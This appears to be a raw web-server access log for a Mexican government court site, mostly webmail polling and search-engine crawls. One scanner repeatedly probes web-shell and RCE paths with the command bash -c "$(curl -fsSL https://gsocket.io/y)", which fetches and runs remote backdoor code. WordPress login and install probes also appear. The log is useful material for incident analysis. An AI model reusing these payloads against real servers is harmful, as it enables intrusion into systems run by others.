187.195.116.142 - - [05/Feb/2025:12:20:26 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:20:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.72.139 - - [05/Feb/2025:12:20:49 -0600] "GET / HTTP/1.1" 301 238 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.199 - - [05/Feb/2025:12:20:55 -0600] "GET /09249115251.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
189.243.238.36 - - [05/Feb/2025:12:21:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12365 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
40.77.167.22 - - [05/Feb/2025:12:21:21 -0600] "GET /img/noticias/773_TJAM%2028agosto20%20TRES.fw.png HTTP/1.1" 301 286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:21:26 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:21:27 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:21:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.244.66.234 - - [05/Feb/2025:12:21:36 -0600] "GET /Igualdad-de-Genero/carrusel/img/foto_16.jpg HTTP/1.1" 301 281 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:12:21:37 -0600] "GET /archivo/Amparo/2016/view-box_2021/Denuncias HTTP/1.1" 301 281 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.77.198 - - [05/Feb/2025:12:22:16 -0600] "GET /79861955027.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:22:26 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
114.119.138.179 - - [05/Feb/2025:12:22:31 -0600] "GET /sisofi/uploads/27-04-2017/RESOLUCION_JA-206-2016-II__SEGUNDA.pdf HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
187.195.110.68 - - [05/Feb/2025:12:22:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:22:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:23:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12366 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:23:26 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:23:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:23:49 -0600] "GET /102321617702.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
40.77.167.33 - - [05/Feb/2025:12:24:11 -0600] "GET /item/ttpd131hasbn23598.html HTTP/1.1" 301 265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:24:26 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:24:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:25:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:25:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12359 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.200 - - [05/Feb/2025:12:25:07 -0600] "GET /015211612881.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
187.195.116.142 - - [05/Feb/2025:12:25:27 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
52.167.144.20 - - [05/Feb/2025:12:25:29 -0600] "GET /absolute91/3bfyd-48059/ HTTP/1.1" 301 261 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:25:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:26:19 -0600] "GET /41446621590.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.199 - - [05/Feb/2025:12:26:20 -0600] "GET /04038136464.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:26:28 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:26:32 -0600] "GET /91118431603.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
187.195.110.68 - - [05/Feb/2025:12:26:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
40.77.167.22 - - [05/Feb/2025:12:26:55 -0600] "GET /legislacion/reglamentos/view-box_2021/pdf/Juicio-en-Linea HTTP/1.1" 301 295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:27:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12364 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
52.167.144.196 - - [05/Feb/2025:12:27:11 -0600] "GET /archivo/6%20Tercera%20Sala%20Administrativa%20Ordinaria/2016/view-box_2021/Juicio-en-Linea HTTP/1.1" 301 328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:27:29 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
52.167.144.23 - - [05/Feb/2025:12:27:34 -0600] "GET /calendario-oficial?q=2025 HTTP/1.1" 301 263 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:27:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:27:50 -0600] "GET /37283636420.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:28:00 -0600] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:28:15 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:28:30 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:28:30 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:28:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:28:41 -0600] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
52.167.144.205 - - [05/Feb/2025:12:28:48 -0600] "GET /sisofi_2018/uploads/13-01-2023/view-box_2021/pdf/view-box_2021/Reglamento%20Interior%20TJAM.pdf HTTP/1.1" 301 333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
69.197.182.50 - - [05/Feb/2025:12:28:49 -0600] "GET /wp-includes/install.php HTTP/1.1" 301 261 "https://tjamich.gob.mx/wp-includes/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.182.50 - - [05/Feb/2025:12:28:49 -0600] "GET / HTTP/1.1" 301 238 "https://tjamich.gob.mx" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
134.209.102.237 - - [05/Feb/2025:12:28:52 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
204.10.194.36 - - [05/Feb/2025:12:29:00 -0600] "POST /wp-login.php HTTP/1.1" 301 247 "https://tjamich.gob.mx/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:29:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:29:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12364 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:29:01 -0600] "GET /07890310751.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
134.209.102.237 - - [05/Feb/2025:12:29:11 -0600] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:29:22 -0600] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:29:31 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:29:34 -0600] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:29:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:29:46 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:29:52 -0600] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.70.79 - - [05/Feb/2025:12:29:53 -0600] "GET / HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:30:09 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:30:25 -0600] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:30:32 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:30:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:30:42 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:30:47 -0600] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:31:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12359 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:31:17 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:24 -0600] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:31 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:33 -0600] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:31:33 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:31:33 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:31:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:31:39 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:31:56 -0600] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:32:03 -0600] "GET /35072184713.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:32:15 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
52.167.144.17 - - [05/Feb/2025:12:32:20 -0600] "GET /sisofi_2018/uploads/26-02-2023/pdf/view-box_2021/view-box_2021/pdf/Transparencia-Proactiva HTTP/1.1" 301 328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:32:29 -0600] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.116.142 - - [05/Feb/2025:12:32:34 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:32:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:32:36 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:32:46 -0600] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:32:52 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
189.243.238.36 - - [05/Feb/2025:12:33:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12364 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
